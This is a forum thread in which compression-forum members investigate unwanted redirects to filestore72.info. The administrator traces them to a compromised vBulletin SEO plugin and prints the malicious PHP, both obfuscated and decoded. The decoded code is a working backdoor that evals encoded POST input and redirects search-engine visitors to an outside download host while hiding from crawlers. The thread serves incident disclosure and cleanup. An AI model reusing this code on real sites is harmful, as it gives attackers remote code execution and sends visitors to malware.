Results 1 to 4 of 4

Thread: encode.su hacked ? : redirect to filestore72.info

  1. #1
    Member
    Join Date
    Mar 2013
    Location
    Worldwide
    Posts
    565
    Thanks
    67
    Thanked 199 Times in 147 Posts

    encode.su hacked ? : redirect to filestore72.info

    Possibly "encode.su" hacked to redirect links to "filestore72.info".
    Please check!
    I've found some info here: Vbulletin hacked

    Tweet 1 : R2Games: In late 2015, the gaming website R2Games was hacked and more than 2.1M personal records disclosed. The vBulletin forum included IP addresses and passwords stored as salted hashes using a weak implementation enabling many to be rapidly cracked.

    Tweet 2: I hacked together a template hot-loader for vBulletin that lets you dump all template files and modify them directly...

  2. Thanks (2):

    schnaader (30th August 2019),Shelwien (30th August 2019)

  3. #2
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    I don't think it was hacked - probably webmaster's legacy. He had some SEO scripts etc, I probably missed something.

  4. #3
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    Yeah, its apparently a consequence of "vbseo" plugin, which inserted exploit code into init code of "post thanks" plugin.
    I removed it - apparently it existed since long ago, even on encode.ru (present in my DB snapshots).

    Exploit code is like this:
    Code:
    $pt = '661c299f5877f7e1368f61a143062e6d';
    $arrvb = '30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m"=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3")o+CJ[1Kj]#.q^w6J7JjJ7"BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3")o+CJ[g._BVg&B;"8OzCJBg._BVg&O;"%jVJ?o^C+r;KJOzK=!g._xm"_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;"_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+"8?V/jR>)=nqJ>"qJ>z>6rwJ)~^")=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV"&9+gq<zO6:kr!D[|Z:z|~6m"=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A"BVAm"8?zCJK+g>Am"=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm";R+"8?V/jR>)=bn6=#7wJz>C_VE7%fm";R>Cel>l%AkKJ6E.q^q6Jw"BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm";R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m"wR>C[9>KJo>B&6m"8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+"_6#l&0;K)6m"=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om"_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m"}=3BqQ^7kOEnQ=+gr<VbQ=m";RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+"&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`';
    $ajx = ':eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j"7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<';
    $ajx2 = '.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($"%oY!m{e_y}]wV*7GKDln^vF5p';
    $baseline = '%s%'.substr($arrvb, 733, 1);
    $gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');
    which is decrypted to
    $q='ini_set';
    if(function_exists($q)){$q('display_errors',0);
    $q('log_errors',0);
    }if(isset($_POST[$pt]))eval(base64_decode(str_rot13($_POST[$pt])));
    $u=@preg_match('
    bot|spider|crawl|slurp|yandex
    i',$_SERVER['HTTP_USER_AGENT']);
    $s=@parse_url($_SERVER['HTTP_REFERER']);
    $t=@$s['host'];
    $r=@preg_match('
    live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly
    i',$t)||$t=='t.co';
    $h=@$_SERVER['HTTP_HOST'];
    $p=@COOKIE_PREFIX;
    $a=@THIS_SCRIPT==='misc';
    $c=$p.'lastvisit';
    $n=$p.'lang_id';
    $y=@ord(FILE_VERSION)>51;
    $z=empty($_SERVER['HTTP_X_MOZ']);
    $j='<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;
    js=js"></script>';
    if(empty($_COOKIE[$n])){if($a&&isset($_GET['v'])&&(isset($_GET['js']))&&(!empty($_COOKIE[$c]))){if($t==$h){if($z)setcookie($n,'en',time()+36000);
    $m=substr(md5($h),0,8);
    print("document.location='http://filestore72.info/download.php?id={$m}'");
    }exit;
    }if((!$u)&&$r){if($y){$GLOBALS['template_hook']['headinclude_javascript'].=$j;
    }else{$GLOBALS['style']['css'].=$j;
    }}}

  5. Thanks:

    schnaader (30th August 2019)

  6. #4
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    "First we need to understand the source of the virus. If you use the following plug-ins on your site, the virus enters your site through these plug-ins.

    VSA Chat,
    VSA Advanced Statistics,
    Ajax Advanced Statistics,
    vBSEO,
    vBSEO Sitemap Generator

    The virus adds its own code to the database and is very difficult to find. In addition, if you delete the virus codes, malicious codes are added again after 1 day."

Similar Threads

  1. ENCODE.RU has been moved to ENCODE.SU
    By encode in forum The Off-Topic Lounge
    Replies: 55
    Last Post: 11th August 2020, 21:01
  2. Any info about AIN?
    By nikkho in forum Data Compression
    Replies: 3
    Last Post: 7th March 2016, 16:47
  3. SpeedNar = WinRar Hacked edition by China?
    By BetaTester in forum Data Compression
    Replies: 6
    Last Post: 12th February 2012, 11:27
  4. Channel info
    By Shelwien in forum The Off-Topic Lounge
    Replies: 0
    Last Post: 18th August 2010, 19:53
  5. gzip-1.2.4-hack - a hacked version of gzip
    By encode in forum Forum Archive
    Replies: 63
    Last Post: 10th September 2007, 05:16

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •